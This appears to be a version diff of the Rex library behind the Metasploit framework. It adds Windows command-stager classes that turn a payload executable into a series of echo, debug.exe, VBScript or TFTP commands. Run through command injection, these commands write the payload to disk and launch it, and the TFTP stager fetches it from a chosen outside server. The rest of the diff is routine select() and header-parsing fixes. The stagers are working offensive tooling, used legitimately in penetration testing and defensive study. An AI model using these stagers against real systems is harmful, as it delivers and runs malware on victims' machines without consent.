librex 0.0.1 → 0.0.3

data/lib/rex/exploitation/cmdstager/debug_write.rb

@@ -0,0 +1,136 @@
+##
+# $Id$
+##
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will 
+# be written to disk and executed.
+#
+# This particular version uses debug.exe to write a small .NET binary. That binary will
+# take a hex-ascii file, created via echo >>, and decode it to the final binary.
+#
+# Requires: .NET, debug.exe
+#
+###
+
+class CmdStagerDebugWrite < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@var_bypass  = Rex::Text.rand_text_alpha(8)
+		@var_payload = Rex::Text.rand_text_alpha(8)
+		@decoder     = nil # filled in later
+	end
+
+
+	#
+	# Override just to set the extra byte count
+	#
+	def generate_cmds(opts)
+		# Set the start/end of the commands here (vs initialize) so we have @tempdir
+		@cmd_start = "echo "
+		@cmd_end   = ">>#{@tempdir}#{@var_payload}"
+		xtra_len = @cmd_start.length + @cmd_end.length + 1
+		opts.merge!({ :extra => xtra_len })
+		super
+	end
+
+
+	#
+	# Simple hex encoding...
+	#
+	def encode_payload(opts)
+		@exe.unpack('H*')[0]
+	end
+
+
+	#
+	# Combine the parts of the encoded file with the stuff that goes
+	# before / after it.
+	#
+	def parts_to_commands(parts, opts)
+
+		cmds = []
+		parts.each do |p|
+			cmd = ''
+			cmd << @cmd_start
+			cmd << p
+			cmd << @cmd_end
+			cmds << cmd
+		end
+
+		cmds
+	end
+
+
+	#
+	# Generate the commands that will decode the file we just created
+	#
+	def generate_cmds_decoder(opts)
+
+		# Allow decoder stub override (needs to input base64 and output bin)
+		@decoder = opts[:decoder] if (opts[:decoder])
+
+		# Read the decoder data file
+		f = File.new(@decoder, "rb")
+		decoder = f.read(f.stat.size)
+		f.close
+
+		# Replace variables
+		decoder.gsub!(/decoder_stub/, "#{@tempdir}#{@var_bypass}")
+
+		# Split it apart by the lines
+		decoder.split("\n")
+	end
+
+
+	#
+	# We override compress commands just to stick in a few extra commands
+	# last second..
+	#
+	def compress_commands(cmds, opts)
+		# Convert the debug script to an executable...
+		cvt_cmd = ''
+		if (@tempdir != '')
+			cvt_cmd << "cd %TEMP% && "
+		end
+		cvt_cmd << "debug < #{@tempdir}#{@var_bypass}"
+		cmds << cvt_cmd
+
+		# Rename the resulting binary
+		cmds << "move #{@tempdir}#{@var_bypass}.bin #{@tempdir}#{@var_bypass}.exe"
+
+		# Converting the encoded payload...
+		cmds << "#{@tempdir}#{@var_bypass}.exe #{@tempdir}#{@var_payload}"
+
+		# Make it all happen
+		cmds << "start #{@tempdir}#{@var_payload}.exe"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			cmds << "del #{@tempdir}#{@var_bypass}.exe"
+			cmds << "del #{@tempdir}#{@var_payload}"
+			# XXX: We won't be able to delete the payload while it is running..
+		end
+
+		super
+	end
+
+	# Windows uses & to concat strings
+	def cmd_concat_operator
+		" & "
+	end
+
+end
+end
+end

data/lib/rex/exploitation/cmdstager/tftp.rb

@@ -0,0 +1,63 @@
+##
+# $Id: tftp.rb 9375 2010-05-26 22:39:56Z jduck $
+##
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses tftp.exe to download a binary from the specified
+# server.  The original file is preserve, not encoded at all, and so this version
+# is significantly simpler than other methods.
+#
+# Requires: tftp.exe, outbound udp connectivity to a tftp server
+#
+# Written by Joshua J. Drake
+#
+###
+
+class CmdStagerTFTP < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@var_payload_out = Rex::Text.rand_text_alpha(8) + ".exe"
+	end
+
+
+	#
+	# We override compress commands just to stick in a few extra commands
+	# last second..
+	#
+	def compress_commands(cmds, opts)
+		# Initiate the download
+		cmds << "tftp -i #{opts[:tftphost]} GET #{opts[:transid]} #{@tempdir + @var_payload_out}"
+
+		# Make it all happen
+		cmds << "start #{@tempdir + @var_payload_out}"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			# XXX: We won't be able to delete the payload while it is running..
+		end
+
+		super
+	end
+
+	# Windows uses & to concat strings
+	def cmd_concat_operator
+		" & "
+	end
+
+end
+end
+end

data/lib/rex/exploitation/cmdstager/vbs.rb

@@ -0,0 +1,128 @@
+##
+# $Id$
+##
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will 
+# be written to disk and executed.
+#
+# This particular version uses Windows Scripting (VBS) to base64 decode a file,
+# created via echo >>, and decode it to the final binary.
+#
+# Requires: Windows Scripting
+# Known Issue: errors with non-ascii-native systems
+#
+# Written by bannedit
+#
+###
+
+class CmdStagerVBS < CmdStagerBase
+
+	def initialize(exe)
+		super
+
+		@var_decoder = Rex::Text.rand_text_alpha(5)
+		@var_encoded = Rex::Text.rand_text_alpha(5)
+		@var_decoded = Rex::Text.rand_text_alpha(5)
+		@decoder     = nil # filled in later
+	end
+
+
+	#
+	# Override just to set the extra byte count
+	#
+	def generate_cmds(opts)
+		# Set the start/end of the commands here (vs initialize) so we have @tempdir
+		@cmd_start = "echo "
+		@cmd_end   = ">>#{@tempdir}#{@var_encoded}.b64"
+		xtra_len = @cmd_start.length + @cmd_end.length + 1
+		opts.merge!({ :extra => xtra_len })
+		super
+	end
+
+
+	#
+	# Simple base64...
+	#
+	def encode_payload(opts)
+		Rex::Text.encode_base64(@exe)
+	end
+
+
+	#
+	# Combine the parts of the encoded file with the stuff that goes
+	# before / after it.
+	#
+	def parts_to_commands(parts, opts)
+
+		cmds = []
+		parts.each do |p|
+			cmd = ''
+			cmd << @cmd_start
+			cmd << p
+			cmd << @cmd_end
+			cmds << cmd
+		end
+
+		cmds
+	end
+
+
+	#
+	# Generate the commands that will decode the file we just created
+	#
+	def generate_cmds_decoder(opts)
+
+		# Allow decoder stub override (needs to input base64 and output bin)
+		@decoder = opts[:decoder] if (opts[:decoder])
+
+		# Read the decoder data file
+		f = File.new(@decoder, "rb")
+		decoder = f.read(f.stat.size)
+		f.close
+
+		# Replace variables
+		decoder.gsub!(/decode_stub/, "#{@tempdir}#{@var_decoder}.vbs")
+		decoder.gsub!(/ENCODED/, "#{@tempdir}#{@var_encoded}.b64")
+		decoder.gsub!(/DECODED/, "#{@tempdir}#{@var_decoded}.exe")
+
+		# Split it apart by the lines
+		decoder.split("\n")
+	end
+
+
+	#
+	# We override compress commands just to stick in a few extra commands
+	# last second..
+	#
+	def compress_commands(cmds, opts)
+		# Make it all happen
+		cmds << "cscript //nologo #{@tempdir}#{@var_decoder}.vbs"
+
+		# Clean up after unless requested not to..
+		if (not opts[:nodelete])
+			cmds << "del #{@tempdir}#{@var_decoder}.vbs"
+			cmds << "del #{@tempdir}#{@var_encoded}.b64"
+			# NOTE: We won't be able to delete the exe while it's in use.
+		end
+
+		super
+	end
+
+	# Windows uses & to concat strings
+	def cmd_concat_operator
+		" & "
+	end
+
+end
+end
+end

data/lib/rex/io/stream.rb

@@ -73,8 +73,8 @@ module Stream
 	#
 	def has_read_data?(timeout = nil)
 		begin
-			if RUBY_VERSION =~ /^1\.9\./
-				if ((rv = ::Kernel.select([ fd ], nil, nil, timeout)) and
+			if RUBY_VERSION =~ /^1\.9\./ and RUBY_PLATFORM !~ /cygwin|mingw32/
+				if ((rv = ::IO.select([ fd ], nil, nil, timeout)) and
 				    (rv[0]) and
 				    (rv[0][0] == fd))
 					true

data/lib/rex/io/stream_server.rb

@@ -142,7 +142,7 @@ protected
 				cli = accept
 				if not cli
 					elog("The accept() returned nil in stream server listener monitor:  #{fd.inspect}")
-					::Kernel.select(nil, nil, nil, 0.10)
+					::IO.select(nil, nil, nil, 0.10)
 					next
 				end
 

data/lib/rex/job_container.rb

@@ -30,8 +30,8 @@ class Job
 		if (async)
 			self.job_thread = Thread.new {
 				# Deschedule our thread momentarily
-				select(nil, nil, nil, 0.01)
-				
+				::IO.select(nil, nil, nil, 0.01)
+
 				begin
 					run_proc.call(ctx)
 				ensure
@@ -57,7 +57,7 @@ class Job
 			self.job_thread.kill
 			self.job_thread = nil
 		end
-			
+
 		clean_proc.call(ctx) if (clean_proc)
 	end
 
@@ -71,13 +71,13 @@ class Job
 		ret['name'] = self.name
 		if(self.ctx.class == Array)
 			con  = self.ctx[0]
-			
+
 		else
 			con = self.ctx
 		end
 		ret['datastore'] = con.datastore
 		if(con.kind_of? Msf::Exploit::Remote::HttpServer)
-			
+
 			ret['datastore']['URIPATH'] = con.get_resource()
 		end
 		ret
@@ -92,7 +92,7 @@ class Job
 	#
 	attr_reader :jid
 
-	# 
+	#
 	# The time at which this job was started
 	#
 	attr_reader   :start_time #:nodoc:
@@ -200,3 +200,4 @@ protected
 end
 
 end
+

data/lib/rex/mime/header.rb

@@ -5,12 +5,12 @@ class Header
 	require 'rex/text'
 
 	attr_accessor :headers
-	
+
 	def initialize(data='')
 		self.headers = []
 		parse(data)
 	end
-	
+
 	def parse(data)
 		prev = nil
 		data.gsub("\r", '').split("\n").each do |line|
@@ -23,17 +23,18 @@ class Header
 				self.headers[prev][1] << line.strip
 				next
 			end
-			
+
 			var,val = line.split(':')
-			self.headers << [ var.strip, val.strip ]
+			next if not val
+			self.headers << [ var.to_s.strip, val.to_s.strip ]
 			prev = self.headers.length - 1
 		end
 	end
-	
+
 	def to_s
 		self.headers.map{ |pair| "#{pair[0]}: #{pair[1]}\r\n" }.join
 	end
-	
+
 	def find(idx)
 		if (idx.class == ::Fixnum)
 			return self.headers[idx]
@@ -46,7 +47,7 @@ class Header
 		end
 		nil
 	end
-	
+
 	def set(var, val)
 		hdr = self.find(var) || self.add(var, '')
 		hdr[1] = val
@@ -56,7 +57,7 @@ class Header
 		self.headers << [var, val]
 		self.headers[-1]
 	end
-	
+
 	def remove(idx)
 		if (idx.class == ::Fixnum)
 			self.headers.delete_at(idx)
@@ -67,9 +68,10 @@ class Header
 					self.headers.delete_at(i)
 				end
 			end
-		end	
+		end
 	end
 
 end
 end
-end
+end
+